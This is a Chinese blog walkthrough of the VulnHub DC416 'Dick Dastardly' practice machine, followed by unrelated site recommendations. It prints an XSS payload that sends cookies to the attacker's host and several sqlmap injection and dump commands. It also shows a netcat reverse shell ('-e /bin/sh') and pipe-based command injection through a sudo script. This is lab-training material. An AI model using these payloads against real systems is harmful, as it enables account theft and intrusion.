DC416-dastardly

已于 2023-04-02 18:06:49 修改
阅读量312 收藏 1
点赞数
文章标签: php 安全 开发语言
于 2023-04-02 18:06:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45778886/article/details/128899546
版权

参考:https://firefart.at/post/vulnhub_dc416_dick_dastardly/
https://habr.com/ru/post/318372/
https://g0blin.co.uk/dick-dastardly-vulnhub-writeup/

信息收集

端口,系统,服务探测

在这里插入图片描述

目录扫描

网页banner信息

index.php
在这里插入图片描述
report.php
在这里插入图片描述

漏洞利用

XSS

在report.php中存在xss
kali起一个http服务

python -m http.server

Test<img src=http://192.168.189.132:8000/dick>

在这里插入图片描述

这里应该模拟存储型XSS,靶机应该有点击留言的机制,稍几分钟后
在这里插入图片描述

截取Cookie

<script>top.location="http://192.168.189.132:8000/" + document.cookie;</script>

在这里插入图片描述
接受到Http请求,并截取到Cookie
在这里插入图片描述
编辑admin.php的cookie后无反应,观察cookie发现是base64编码,解码出一下内容

rasta:1b37y0uc4n76u3557h15p455w0rd,5uck3rz

这就是admin用户

SQL注入

index.php
注入点1:时间盲注

user=rasta&pass=admin

sqlmap -u http://192.168.189.134/index.php --data "user=rasta&pass=admin" --random-agent --level=5 --risk=3 --batch

在这里插入图片描述
注入点2:时间盲注

name=asd&msg=asd

sqlmap -u http://192.168.189.134/index.php --data "name=asd&msg=asd" --random-agent --level=5 --risk=3 --batch

在这里插入图片描述
report.php
注入点:布尔注入

issue=asdf

sqlmap -u http://192.168.189.134/report.php --data "issue=asdf"--random-agent --level=5 --risk=3 --batch

在这里插入图片描述
查找密码

sqlmap -u http://192.168.189.134/report.php --data "issue=asdf" --random-agent --level=5 --risk=3 --batch -D vulnhub -T admins --dump

在这里插入图片描述
登录Web应用程序,并显示IRC服务器的管理员应用程序。
在这里插入图片描述
我们通过此页面将我们的IP添加到白名单中,然后再次进行端口扫描

nmap -T4 -A -v -p0-65535 192.168.189.134

在这里插入图片描述
发现开放的irc服务,以root用户使用weechat连接IRC服务器

weechat
/server add vulnhub 192.168.189.134
/connect vulnhub

在这里插入图片描述
所有频道的列表/list
在这里插入图片描述
我们加入vulnhub频道,看到有一个vulnhub-bot用户

/join #vulhub

/query vulnhub-bot

我们得到一个帮助菜单:help
在这里插入图片描述
让我们执行上述命令:list
在这里插入图片描述
通过详细查看所有插件,揭示了一种方法: list Unix
在这里插入图片描述
因此,让我们尝试以下命令:shell
在这里插入图片描述
whoami
在这里插入图片描述
好的,让我们尝试一下我们在管理对话框中添加的用户的凭据:user identify vulnhub 123456
这个用户在web页面添加

在这里插入图片描述
继续shell
在这里插入图片描述
让我们使用Unix shell反弹一个shell:

Unix shell netcat -e /bin/sh 192.168.189.132

在这里插入图片描述
让我们看看当前用户可以使用哪些权限:

sudo -l

显示用户 rasta 可以在 DickDastardly 上运行以下命令: (vulnhub) NOPASSWD:

/usr/bin/python /usr/local/sbin/util.py
在这里插入图片描述
所以让我们试试看:

sudo -u vulnhub /usr/bin/python /usr/local/sbin/util.py

我使用nc接受shell,运行python脚本没回显,可以使用meterpreter生成shell,用MSF接受shell,我这就不做演示了
以上python脚本运行结果如下
在这里插入图片描述
随意尝试序号,发现2是列目录
在这里插入图片描述
且可以在目录后面用|拼接命令,于是便可以查看flag3
在这里插入图片描述

echokp
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
实现原理-Connect
run_for_belief的博客
08-17 693
最近遇到阻塞式connect在三步握手过程中,客户端自身IP发生变化时,connect系统调用阻塞时间过长的问题。除将connect修改为非阻塞的方式外,跟踪学习connect的socket层及TCP层实现,简单归纳整理。
Codeforces Gym 100523E E - Gophers SET
weixin_30414635的博客
08-14 68
E -GophersTime Limit: 20 Sec Memory Limit: 256 MB 题目连接 http://acm.hust.edu.cn/vjudge/contest/view.action?cid=87794#problem/E Description Dick Dastardly want...
Wireshark 210: Dissectors
lixiangminghate的专栏
10-12 530
转自:vonnie Let’s say you had a full evening to yourself.  If you’re a student, you don’t have to study.  If you’re a husband you don’t have to do the chores, if you’re a wife with kids then you don’t ...
TCP的定时器系列 — 超时重传定时器
热门推荐
zhangskd的专栏
03-30 2万+
主要内容:TCP定时器开篇,超时重传定时器、ER延迟定时器、PTO定时器的实现。 内核版本:3.15.2 我的博客:http://blog.csdn.net/zhangskd   Q:一条TCP连接会使用多少个定时器呢? A:目前的答案是9个: 超时重传定时器,持续定时器,ER延迟定时器,PTO定时器,ACK延迟定时器, SYNACK定时器,保活定时器,FIN_WAIT2定时器,CL
转 外企面试--基本涵盖了所有问题
congfei8606的博客
06-03 181
1. So, tell me a little about yourself. You don’t need to explain everything from birth to present day. Relevant f...
外企面试--基本涵盖了所有问题(一)…
不积跬步无以至千里,千里之行始于足下!
12-02 1027
1. So, tell me a little about yourself.You don’t need to explain everything from birth to present day. Relevant facts about education, your career and your current life situation are fine. 2. Why a
C#基础知识系列一(goto、i++、三元运算符、ref和out、String和string、重载运算符)
LisenYang的专栏
01-23 1262
前言   这两天在网上看到的总结很多,尤其是博客园中的,很多很多,也给了我很多的启发,当然自己也总结过,而且有很多人也给与我一些意见和看法。不管怎样,自己还是先把所谓的基础知识加强巩固下吧。   2014年的第一篇博客,希望自己从基础开始。也是希望自己能够稍微系统来学习整合一下。因为之前从来都没系统学习过,都是用到啥查啥,先查啥就忘啥快,所以在此记录一下,以备以后查看。好了废话也不多说
外企面试--基本涵盖了所有问题(很长)
JackieGemini
12-09 1471
1. So, tell me a little about yourself. You don’t need to explain everything from birth to present day. Relevant facts about education, your career and your current life situation are fine. 2. Why
PHP小课堂】PHP中的数组函数学习(一)
硬核项目经理
07-22 467
PHP中的数组函数学习(一)数组操作可是 PHP 中的重头戏,重头到什么地步呢?别的语言可以说是面向对象、面向过程,PHP 则可以完全说是面向数组的一种语言。它的各种数据结构到最后都可以用数组来表示,这就是很恐怖的一件事。因为不管什么操作,我们都可以以数组的形式操作,这样的话,这些数组操作相关的函数就会显得异常的强大。当然,这也和语言的发展特性分不开。从最开始,PHP 就只是一个准备服务于个人的小...
BUUCTF [WUSTCTF2020]朴实无华
weixin_73399382的博客
07-22 286
第一块就是intval函数的绕过,逻辑上是不存在小于2020又大于2021的数,但是php低版本好像是7点多和以下该函数对不同类型的数据处理有偏差,第二处则是md5函数绕过,
PHP项目开发流程概述
api77的博客
07-19 548
需求分析是项目开发的起始点,主要目的是明确项目的目标、功能需求、用户群体等。这一阶段通常通过用户访谈、市场调研、竞品分析等方式进行。
MICA:面向复杂嵌入式系统的混合关键性部署框架
openEuler_的博客
07-23 667
这种方式存在的问题是:硬件上需要两套系统、集成度不高,通信受限于片外物理机制的限制(如速度、时延等),软件上 Linux 和实时操作系统两者之间是割裂的,在灵活性上、可维护性上存在改进空间。在上述架构中,virtio-rpmsg 相当于网络协议中的 MAC 层,提供高效的底层通信机制,rpmsg 相当于网络协议中的传输层,提供了基于端点(endpoint)与通道(channel)抽象的通信机制,remoteproc 提供不同南向底座的生命周期管理功能,包括初始化、启动、暂停、结束等。MICA 的守护进程。
rce漏洞-ctfshow(50-70)
m0_74402888的博客
07-23 669
文件名:
【CTFWP】ctfshow-web42
LongL_GuYu的博客
07-23 567
CTFWP,ctfshow-web42
网络芯片(又称为PHY网络芯片)
最新发布
czy8787475的博客
07-23 70
网络芯片(又称为PHY网络芯片)
BGP选路之Next Hop
txs1269928052的博客
07-23 367
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
BGP选路之Local Preference
txs1269928052的博客
07-23 600
BGP协议在向BGP对等体传递路由时只传递最佳路由,同时,由于IBGP的防环机制,BGP路由器不会将从IBGP对等体那里学到的路由再传递给别的IBGP对等体,因此,R2就不会再向R4传递关于10.0.1.1/32与10.0.100.2/32的路由了,最后的结果是,R4的BGP路由表中最终只存在去往10.0.1.1/32与10.0.100.2/32的下一跳为R3(10.0.3.3)的路由。接下来,我们将对Local Preference值进行修改,使得公司的内部网络发送数据到服务器B时以R3为出口。
BurpSuite Dastardly 安装
07-24
很抱歉,我之前给出的"Dastardly"的回答是不准确的,我没有找到与"Dastardly"相关的Burp Suite版本或安装信息。Burp Suite是一款功能强大的网络安全测试工具,但是没有名为"Dastardly"的特定版本。 如果你想安装...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值